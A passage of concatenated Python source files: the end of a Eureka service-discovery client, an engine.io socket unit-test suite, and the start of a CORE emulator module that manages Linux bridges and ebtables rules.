cadefault=cadefault, context=context)
if on_success is not None and (inspect.isfunction(on_success) or inspect.ismethod(on_success)):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (inspect.isfunction(on_error) or inspect.ismethod(on_error)):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def do_service(self, app_name: str = "", service: str = "", return_type: str = "string",
prefer_ip: bool = False, prefer_https: bool = False,
method: str = "GET", headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None, timeout: float = _DEFAULT_TIME_OUT,
cafile: str = None, capath: str = None, cadefault: bool = False, context: ssl.SSLContext = None) -> Union[str, Dict, http_client.HTTPResponse]:
if data and isinstance(data, dict):
_data = json.dumps(data).encode()
elif data and isinstance(data, str):
_data = data.encode()
else:
_data = data
def walk_using_urllib(url):
req = http_client.Request(url, method=method)
heads = headers if headers is not None else {}
for k, v in heads.items():
req.add_header(k, v)
res_txt, res = http_client.load(req, data=_data, timeout=timeout, cafile=cafile, capath=capath, cadefault=cadefault, context=context)
if return_type.lower() in ("json", "dict", "dictionary"):
return json.loads(res_txt)
elif return_type.lower() == "response_object":
return res
else:
return res_txt
return self.walk_nodes(app_name, service, prefer_ip, prefer_https, walk_using_urllib)
def __get_service_not_in_ignore_list(self, instances, ignores):
ign = ignores if ignores else []
return [item for item in instances if item.instanceId not in ign]
def __get_available_service(self, application_name, ignore_instance_ids=None):
apps = self.applications
if not apps:
raise DiscoverException("Cannot load registry from eureka server, please check your configurations. ")
app = apps.get_application(application_name)
if app is None:
return None
up_instances = []
if self.__prefer_same_zone:
ups_same_zone = app.up_instances_in_zone(self.zone)
up_instances = self.__get_service_not_in_ignore_list(ups_same_zone, ignore_instance_ids)
if not up_instances:
ups_not_same_zone = app.up_instances_not_in_zone(self.zone)
_logger.debug(
f"app[{application_name}] has no up instances available in its own zone, falling back to instances from other zones: {[ins.instanceId for ins in ups_not_same_zone]}")
up_instances = self.__get_service_not_in_ignore_list(ups_not_same_zone, ignore_instance_ids)
else:
up_instances = self.__get_service_not_in_ignore_list(app.up_instances, ignore_instance_ids)
if len(up_instances) == 0:
# no up instances
return None
elif len(up_instances) == 1:
# only one available instance, so the strategy does not matter.
instance = up_instances[0]
self.__ha_cache[application_name] = instance.instanceId
return instance
def random_one(instances):
if len(instances) == 1:
idx = 0
else:
idx = random.randint(0, len(instances) - 1)
selected_instance = instances[idx]
self.__ha_cache[application_name] = selected_instance.instanceId
return selected_instance
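# Strategy dispatch (summarised from the branches below): HA_STRATEGY_RANDOM
# picks any up instance, HA_STRATEGY_STICK keeps returning the previously cached
# instance for this app while it is still UP, and HA_STRATEGY_OTHER deliberately
# picks an instance other than the cached one.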
if self.__ha_strategy == HA_STRATEGY_RANDOM:
return random_one(up_instances)
elif self.__ha_strategy == HA_STRATEGY_STICK:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
cache_instance = app.get_instance(cache_id)
if cache_instance is not None and cache_instance.status == INSTANCE_STATUS_UP:
return cache_instance
else:
return random_one(up_instances)
else:
return random_one(up_instances)
elif self.__ha_strategy == HA_STRATEGY_OTHER:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
other_instances = []
for up_instance in up_instances:
if up_instance.instanceId != cache_id:
other_instances.append(up_instance)
return random_one(other_instances)
else:
return random_one(up_instances)
else:
return None
def __generate_service_url(self, instance, prefer_ip, prefer_https):
if instance is None:
return None
schema = "http"
port = 0
if instance.port.port and not instance.securePort.enabled:
schema = "http"
port = instance.port.port
elif not instance.port.port and instance.securePort.enabled:
schema = "https"
port = instance.securePort.port
elif instance.port.port and instance.securePort.enabled:
if prefer_https:
schema = "https"
port = instance.securePort.port
else:
schema = "http"
port = instance.port.port
else:
assert False, "generate_service_url error: No port is available"
host = instance.ipAddr if prefer_ip else instance.hostName
return f"{schema}://{host}:{port}/"
def __start_discover(self):
self.__pull_full_registry()
def start(self) -> None:
if self.should_register:
self.__start_register()
if self.should_discover:
self.__start_discover()
self.__heartbeat_timer.start()
def stop(self) -> None:
if self.__heartbeat_timer.is_alive():
self.__heartbeat_timer.cancel()
if self.__should_register:
self.__stop_registry()
__cache_key = "default"
__cache_clients = {}
__cache_clients_lock = RLock()
def init(eureka_server: str = _DEFAULT_EUREKA_SERVER_URL,
eureka_domain: str = "",
region: str = "",
zone: str = "",
eureka_availability_zones: Dict[str, str] = {},
eureka_protocol: str = "http",
eureka_basic_auth_user: str = "",
eureka_basic_auth_password: str = "",
eureka_context: str = "/eureka",
prefer_same_zone: bool = True,
should_register: bool = True,
should_discover: bool = True,
on_error: Callable = None,
app_name: str = "",
instance_id: str = "",
instance_host: str = "",
instance_ip: str = "",
instance_ip_network: str = "",
instance_port: int = _DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled: bool = True,
instance_secure_port: int = _DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled: bool = False,
data_center_name: str = _DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs: int = _RENEWAL_INTERVAL_IN_SECS,
duration_in_secs: int = _DURATION_IN_SECS,
home_page_url: str = "",
status_page_url: str = "",
health_check_url: str = "",
secure_health_check_url: str = "",
vip_adr: str = "",
secure_vip_addr: str = "",
is_coordinating_discovery_server: bool = False,
metadata: Dict = {},
remote_regions: List[str] = [],
ha_strategy: int = HA_STRATEGY_RANDOM) -> EurekaClient:
"""
Initialize an EurekaClient object and put it to cache, you can use a set of functions to do the service.
Unlike using EurekaClient class that you need to start and stop the client object by yourself, this method
will start the client automatically after the object created and stop it when the programe exist.
read EurekaClient for more information for the parameters details.
"""
with __cache_clients_lock:
if __cache_key in __cache_clients:
_logger.warn("A client is already running, try to stop it and start the new one!")
__cache_clients[__cache_key].stop()
del __cache_clients[__cache_key]
client = EurekaClient(eureka_server=eureka_server,
eureka_domain=eureka_domain,
region=region,
zone=zone,
eureka_availability_zones=eureka_availability_zones,
eureka_protocol=eureka_protocol,
eureka_basic_auth_user=eureka_basic_auth_user,
eureka_basic_auth_password=eureka_basic_auth_password,
eureka_context=eureka_context,
prefer_same_zone=prefer_same_zone,
should_register=should_register,
should_discover=should_discover,
on_error=on_error,
app_name=app_name,
instance_id=instance_id,
instance_host=instance_host,
instance_ip=instance_ip,
instance_ip_network=instance_ip_network,
instance_port=instance_port,
instance_unsecure_port_enabled=instance_unsecure_port_enabled,
instance_secure_port=instance_secure_port,
instance_secure_port_enabled=instance_secure_port_enabled,
data_center_name=data_center_name,
renewal_interval_in_secs=renewal_interval_in_secs,
duration_in_secs=duration_in_secs,
home_page_url=home_page_url,
status_page_url=status_page_url,
health_check_url=health_check_url,
secure_health_check_url=secure_health_check_url,
vip_adr=vip_adr,
secure_vip_addr=secure_vip_addr,
is_coordinating_discovery_server=is_coordinating_discovery_server,
metadata=metadata,
remote_regions=remote_regions,
ha_strategy=ha_strategy)
__cache_clients[__cache_key] = client
client.start()
return client
def get_client() -> EurekaClient:
with __cache_clients_lock:
if __cache_key in __cache_clients:
return __cache_clients[__cache_key]
else:
return None
def walk_nodes_async(app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None,
on_success: Callable = None,
on_error: Callable = None) -> None:
cli = get_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
cli.walk_nodes_async(app_name=app_name, service=service,
prefer_ip=prefer_ip, prefer_https=prefer_https,
walker=walker, on_success=on_success, on_error=on_error)
def walk_nodes(app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None) -> Union[str, Dict, http_client.HTTPResponse]:
cli = get_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
return cli.walk_nodes(app_name=app_name, service=service,
prefer_ip=prefer_ip, prefer_https=prefer_https, walker=walker)
def do_service_async(app_name: str = "", service: str = "", return_type: str = "string",
prefer_ip: bool = False, prefer_https: bool = False,
on_success: Callable = None, on_error: Callable = None,
method: str = "GET", headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None, timeout: float = _DEFAULT_TIME_OUT,
cafile: str = None, capath: str = None, cadefault: bool = False, context: ssl.SSLContext = None) -> None:
cli = get_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
cli.do_service_async(app_name=app_name, service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
on_success=on_success, on_error=on_error,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
def do_service(app_name: str = "", service: str = "", return_type: str = "string",
prefer_ip: bool = False, prefer_https: bool = False,
method: str = "GET", headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None, timeout: float = _DEFAULT_TIME_OUT,
cafile: str = None, capath: str = None, cadefault: bool = False, context: ssl.SSLContext = None) -> Union[str, Dict, http_client.HTTPResponse]:
cli = get_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
return cli.do_service(app_name=app_name, service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
def stop() -> None:
client = get_client()
if client is not None:
client.stop()
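# A minimal sketch of the module-level convenience API defined above; the server
# url, app name and service path are illustrative values, not defaults of this
# module:
#
#   init(eureka_server="http://localhost:8761/eureka/",
#        app_name="python-demo",
#        instance_port=9090)
#   res = do_service("OTHER-SERVICE", "/health", return_type="json")
#   stop()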
@atexit.register
def _cleanup_before_exit():
if len(__cache_clients) > 0:
_logger.debug("cleaning up clients")
for k, cli in __cache_clients.items():
_logger.debug(f"try to stop cache client [{k}] this will also unregister this client from the eureka server")
cli.stop()
|
test_socket.py
|
import time
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
from engineio import packet
from engineio import payload
from engineio import socket
class TestSocket(unittest.TestCase):
def setUp(self):
self.bg_tasks = []
def _get_mock_server(self):
mock_server = mock.Mock()
mock_server.ping_timeout = 0.2
mock_server.ping_interval = 0.2
mock_server.async_handlers = True
try:
import queue
except ImportError:
import Queue as queue
import threading
mock_server.async = {'threading': threading,
'thread_class': 'Thread',
'queue': queue,
'queue_class': 'Queue',
'websocket': None}
def bg_task(target, *args, **kwargs):
th = threading.Thread(target=target, args=args, kwargs=kwargs)
self.bg_tasks.append(th)
th.start()
return th
mock_server.start_background_task = bg_task
return mock_server
def _join_bg_tasks(self):
for task in self.bg_tasks:
task.join()
def test_create(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertEqual(s.server, mock_server)
self.assertEqual(s.sid, 'sid')
self.assertFalse(s.upgraded)
self.assertFalse(s.closed)
self.assertTrue(hasattr(s.queue, 'get'))
self.assertTrue(hasattr(s.queue, 'put'))
self.assertTrue(hasattr(s.queue, 'task_done'))
self.assertTrue(hasattr(s.queue, 'join'))
def test_empty_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(IOError, s.poll)
def test_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
self.assertEqual(s.poll(), [pkt1, pkt2])
def test_ping_pong(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.PING, data='abc'))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertEqual(r[0].encode(), b'3abc')
def test_message_async_handler(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.MESSAGE, data='foo'))
mock_server._trigger_event.assert_called_once_with('message', 'sid',
'foo', async=True)
def test_message_sync_handler(self):
mock_server = self._get_mock_server()
mock_server.async_handlers = False
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.MESSAGE, data='foo'))
mock_server._trigger_event.assert_called_once_with('message', 'sid',
'foo', async=False)
def test_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(ValueError, s.receive, packet.Packet(packet.OPEN))
def test_timeout(self):
mock_server = self._get_mock_server()
mock_server.ping_interval = -0.1
s = socket.Socket(mock_server, 'sid')
s.last_ping = time.time() - 1
s.close = mock.MagicMock()
s.send('packet')
s.close.assert_called_once_with(wait=False, abort=True)
def test_polling_read(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
self.assertEqual(packets, [pkt1, pkt2])
def test_polling_read_error(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
self.assertRaises(IOError, s.handle_get_request, environ,
start_response)
def test_polling_write(self):
mock_server = self._get_mock_server()
mock_server.max_http_buffer_size = 1000
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
s.handle_post_request(environ)
self.assertEqual(s.receive.call_count, 2)
def test_polling_write_too_large(self):
mock_server = self._get_mock_server()
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
mock_server.max_http_buffer_size = len(p) - 1
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
self.assertRaises(ValueError, s.handle_post_request, environ)
def test_upgrade_handshake(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
s._upgrade_websocket = mock.MagicMock()
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo',
'HTTP_CONNECTION': 'Foo,Upgrade,Bar',
'HTTP_UPGRADE': 'websocket'}
start_response = mock.MagicMock()
s.handle_get_request(environ, start_response)
s._upgrade_websocket.assert_called_once_with(environ, start_response)
def test_upgrade(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = mock.MagicMock()
mock_server.async['websocket_class'] = 'WebSocket'
mock_ws = mock.MagicMock()
mock_server.async['websocket'].WebSocket.configure_mock(
return_value=mock_ws)
s = socket.Socket(mock_server, 'sid')
s.connected = True
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server.async['websocket'].WebSocket.assert_called_once_with(
s._websocket_handler)
mock_ws.assert_called_once_with(environ, start_response)
def test_upgrade_twice(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = mock.MagicMock()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.upgraded = True
environ = "foo"
start_response = "bar"
self.assertRaises(IOError, s._upgrade_websocket,
environ, start_response)
def test_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.receive(packet.Packet(packet.UPGRADE))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertEqual(r[0].encode(), packet.Packet(packet.NOOP).encode())
def test_upgrade_no_probe(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
ws = mock.MagicMock()
ws.wait.return_value = packet.Packet(packet.NOOP).encode(
always_bytes=False)
s._websocket_handler(ws)
self.assertFalse(s.upgraded)
def test_upgrade_no_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
ws = mock.MagicMock()
probe = six.text_type('probe')
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.NOOP).encode(always_bytes=False)]
s._websocket_handler(ws)
ws.send.assert_called_once_with(packet.Packet(
packet.PONG, data=probe).encode(always_bytes=False))
self.assertEqual(s.queue.get().packet_type, packet.NOOP)
self.assertFalse(s.upgraded)
def test_upgrade_not_supported(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = None
mock_server.async['websocket_class'] = None
s = socket.Socket(mock_server, 'sid')
s.connected = True
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server._bad_request.assert_called_once_with()
def test_websocket_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertTrue(s.connected)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', 'foo', async=True),
mock.call('disconnect', 'sid', async=False)])
ws.send.assert_called_with('4bar')
def test_websocket_upgrade_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', 'foo', async=True),
mock.call('disconnect', 'sid', async=False)])
ws.send.assert_called_with('4bar')
def test_websocket_upgrade_with_payload(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
probe = six.text_type('probe')
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE, data=b'2').encode(
always_bytes=False)]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertTrue(s.upgraded)
def test_websocket_read_write_fail(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
RuntimeError]
ws.send.side_effect = [None, RuntimeError]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertEqual(s.closed, True)
def test_websocket_ignore_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.OPEN).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertTrue(s.connected)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', foo, async=True),
mock.call('disconnect', 'sid', async=False)])
ws.send.assert_called_with('4bar')
def test_send_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
self.assertRaises(IOError, s.send, packet.Packet(packet.NOOP))
def test_close_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
self.assertTrue(s.closed)
self.assertEqual(mock_server._trigger_event.call_count, 1)
mock_server._trigger_event.assert_called_once_with('disconnect', 'sid',
async=False)
s.close()
self.assertEqual(mock_server._trigger_event.call_count, 1)
def test_close_and_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=True)
s.queue.join.assert_called_once_with()
def test_close_without_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=False)
self.assertEqual(s.queue.join.call_count, 0)
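# Illustrative sketch (not part of the original tests): the upgrade tests above
# exercise the engine.io probe handshake -- the client sends PING "probe", the
# server answers PONG "probe", and an UPGRADE packet completes the switch to
# WebSocket. A hypothetical helper showing the frame encodings the mocks use:
def _example_probe_handshake_frames():
    probe = six.text_type('probe')
    ping = packet.Packet(packet.PING, data=probe).encode(always_bytes=False)
    pong = packet.Packet(packet.PONG, data=probe).encode(always_bytes=False)
    upgrade = packet.Packet(packet.UPGRADE).encode(always_bytes=False)
    return ping, pong, upgrade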
|
network.py
|
"""
Defines network nodes used within core.
"""
import logging
import threading
import time
from typing import TYPE_CHECKING, Callable, Dict, List, Optional, Type
import netaddr
from core import utils
from core.constants import EBTABLES_BIN, TC_BIN
from core.emulator.data import LinkData, NodeData
from core.emulator.enumerations import LinkTypes, NodeTypes, RegisterTlvs
from core.errors import CoreCommandError, CoreError
from core.nodes.base import CoreNetworkBase
from core.nodes.interface import CoreInterface, GreTap, Veth
from core.nodes.netclient import get_net_client
if TYPE_CHECKING:
from core.emulator.distributed import DistributedServer
from core.emulator.session import Session
from core.location.mobility import WirelessModel
WirelessModelType = Type[WirelessModel]
ebtables_lock = threading.Lock()
class EbtablesQueue:
"""
Helper class for queuing up ebtables commands into rate-limited
atomic commits. This improves performance and reliability when there are
many WLAN link updates.
"""
# update rate is every 300ms
rate = 0.3
# ebtables
atomic_file = "/tmp/pycore.ebtables.atomic"
def __init__(self) -> None:
"""
Initialize the helper class, but don't start the update thread
until a WLAN is instantiated.
"""
self.doupdateloop = False
self.updatethread = None
# this lock protects cmds and updates lists
self.updatelock = threading.Lock()
# list of pending ebtables commands
self.cmds = []
# list of WLANs requiring update
self.updates = []
# timestamps of last WLAN update; this keeps track of WLANs that are
# using this queue
self.last_update_time = {}
def startupdateloop(self, wlan: "CoreNetwork") -> None:
"""
Kick off the update loop; only needs to be invoked once.
:return: nothing
"""
with self.updatelock:
self.last_update_time[wlan] = time.monotonic()
if self.doupdateloop:
return
self.doupdateloop = True
self.updatethread = threading.Thread(target=self.updateloop)
self.updatethread.daemon = True
self.updatethread.start()
def stopupdateloop(self, wlan: "CoreNetwork") -> None:
"""
Kill the update loop thread if there are no more WLANs using it.
:return: nothing
"""
with self.updatelock:
try:
del self.last_update_time[wlan]
except KeyError:
logging.exception(
"error deleting last update time for wlan, ignored before: %s", wlan
)
if len(self.last_update_time) > 0:
return
self.doupdateloop = False
if self.updatethread:
self.updatethread.join()
self.updatethread = None
def ebatomiccmd(self, cmd: str) -> str:
"""
Helper for building ebtables atomic file command list.
:param cmd: ebtable command
:return: ebtable atomic command
"""
return f"{EBTABLES_BIN} --atomic-file {self.atomic_file} {cmd}"
def lastupdate(self, wlan: "CoreNetwork") -> float:
"""
Return the time elapsed since this WLAN was last updated.
:param wlan: wlan entity
:return: elapsed time
"""
try:
elapsed = time.monotonic() - self.last_update_time[wlan]
except KeyError:
self.last_update_time[wlan] = time.monotonic()
elapsed = 0.0
return elapsed
def updated(self, wlan: "CoreNetwork") -> None:
"""
Keep track of when this WLAN was last updated.
:param wlan: wlan entity
:return: nothing
"""
self.last_update_time[wlan] = time.monotonic()
self.updates.remove(wlan)
def updateloop(self) -> None:
"""
Thread target that looks for WLANs needing update, and
rate limits the amount of ebtables activity. Only one userspace program
should use ebtables at any given time, or results can be unpredictable.
:return: nothing
"""
while self.doupdateloop:
with self.updatelock:
for wlan in self.updates:
# Check if wlan is from a previously closed session. Because of the
# rate limiting scheme employed here, this may happen if a new session
# is started soon after closing a previous session.
# TODO: if these are WlanNodes, this will never throw an exception
try:
wlan.session
except Exception:
# Just mark as updated to remove from self.updates.
self.updated(wlan)
continue
if self.lastupdate(wlan) > self.rate:
self.buildcmds(wlan)
self.ebcommit(wlan)
self.updated(wlan)
time.sleep(self.rate)
def ebcommit(self, wlan: "CoreNetwork") -> None:
"""
Perform ebtables atomic commit using commands built in the self.cmds list.
:return: nothing
"""
# save kernel ebtables snapshot to a file
args = self.ebatomiccmd("--atomic-save")
wlan.host_cmd(args)
# modify the table file using queued ebtables commands
for c in self.cmds:
args = self.ebatomiccmd(c)
wlan.host_cmd(args)
self.cmds = []
# commit the table file to the kernel
args = self.ebatomiccmd("--atomic-commit")
wlan.host_cmd(args)
try:
wlan.host_cmd(f"rm -f {self.atomic_file}")
except CoreCommandError:
logging.exception("error removing atomic file: %s", self.atomic_file)
def ebchange(self, wlan: "CoreNetwork") -> None:
"""
Flag a change to the given WLAN's _linked dict, so the ebtables
chain will be rebuilt at the next interval.
:return: nothing
"""
with self.updatelock:
if wlan not in self.updates:
self.updates.append(wlan)
def buildcmds(self, wlan: "CoreNetwork") -> None:
"""
Inspect a _linked dict from a wlan, and rebuild the ebtables chain for that WLAN.
:return: nothing
"""
with wlan._linked_lock:
if wlan.has_ebtables_chain:
# flush the chain
self.cmds.append(f"-F {wlan.brname}")
else:
wlan.has_ebtables_chain = True
self.cmds.extend(
[
f"-N {wlan.brname} -P {wlan.policy}",
f"-A FORWARD --logical-in {wlan.brname} -j {wlan.brname}",
]
)
# rebuild the chain
for netif1, v in wlan._linked.items():
for netif2, linked in v.items():
if wlan.policy == "DROP" and linked:
self.cmds.extend(
[
f"-A {wlan.brname} -i {netif1.localname} -o {netif2.localname} -j ACCEPT",
f"-A {wlan.brname} -o {netif1.localname} -i {netif2.localname} -j ACCEPT",
]
)
elif wlan.policy == "ACCEPT" and not linked:
self.cmds.extend(
[
f"-A {wlan.brname} -i {netif1.localname} -o {netif2.localname} -j DROP",
f"-A {wlan.brname} -o {netif1.localname} -i {netif2.localname} -j DROP",
]
)
# a global object because all WLANs share the same queue;
# we cannot have multiple threads invoking the ebtables command
ebq = EbtablesQueue()
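# Illustrative sketch (not part of the original module): the queue above is
# driven by the network nodes defined below. A WLAN registers with
# startupdateloop() when it comes up, flags changes with ebchange() whenever
# link state is toggled, and deregisters with stopupdateloop() on shutdown.
def _example_ebtables_queue_usage(wlan: "CoreNetwork") -> None:
    ebq.startupdateloop(wlan)  # begin rate-limited updates for this WLAN
    ebq.ebchange(wlan)         # mark the WLAN's _linked state as needing a rebuild
    ebq.stopupdateloop(wlan)   # stop the update thread once no WLANs remain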
def ebtablescmds(call: Callable[..., str], cmds: List[str]) -> None:
"""
Run ebtable commands.
:param call: function to call commands
:param cmds: commands to call
:return: nothing
"""
with ebtables_lock:
for args in cmds:
call(args)
class CoreNetwork(CoreNetworkBase):
"""
Provides linux bridge network functionality for core nodes.
"""
policy = "DROP"
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
start: bool = True,
server: "DistributedServer" = None,
policy: str = None,
) -> None:
"""
Creates a CoreNetwork instance.
:param session: core session instance
:param _id: object id
:param name: object name
:param start: start flag
:param server: remote server this node will run on,
default is None for localhost
:param policy: network policy
"""
super().__init__(session, _id, name, start, server)
if name is None:
name = str(self.id)
if policy is not None:
self.policy = policy
self.name = name
sessionid = self.session.short_session_id()
self.brname = f"b.{self.id}.{sessionid}"
self.up = False
self.has_ebtables_chain = False
if start:
self.startup()
ebq.startupdateloop(self)
def host_cmd(
self,
args: str,
env: Dict[str, str] = None,
cwd: str = None,
wait: bool = True,
shell: bool = False,
) -> str:
"""
Runs a command that is used to configure and setup the network on the host
system and all configured distributed servers.
:param args: command to run
:param env: environment to run command with
:param cwd: directory to run command in
:param wait: True to wait for status, False otherwise
:param shell: True to use shell, False otherwise
:return: combined stdout and stderr
:raises CoreCommandError: when a non-zero exit status occurs
"""
logging.debug("network node(%s) cmd", self.name)
output = utils.cmd(args, env, cwd, wait, shell)
self.session.distributed.execute(lambda x: x.remote_cmd(args, env, cwd, wait))
return output
def startup(self) -> None:
"""
Linux bridge startup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.net_client.create_bridge(self.brname)
self.has_ebtables_chain = False
self.up = True
def shutdown(self) -> None:
"""
Linux bridge shutdown logic.
:return: nothing
"""
if not self.up:
return
ebq.stopupdateloop(self)
try:
self.net_client.delete_bridge(self.brname)
if self.has_ebtables_chain:
cmds = [
f"{EBTABLES_BIN} -D FORWARD --logical-in {self.brname} -j {self.brname}",
f"{EBTABLES_BIN} -X {self.brname}",
]
ebtablescmds(self.host_cmd, cmds)
except CoreCommandError:
logging.exception("error during shutdown")
# removes veth pairs used for bridge-to-bridge connections
for netif in self.netifs():
netif.shutdown()
self._netif.clear()
self._linked.clear()
del self.session
self.up = False
def attach(self, netif: CoreInterface) -> None:
"""
Attach a network interface.
:param netif: network interface to attach
:return: nothing
"""
if self.up:
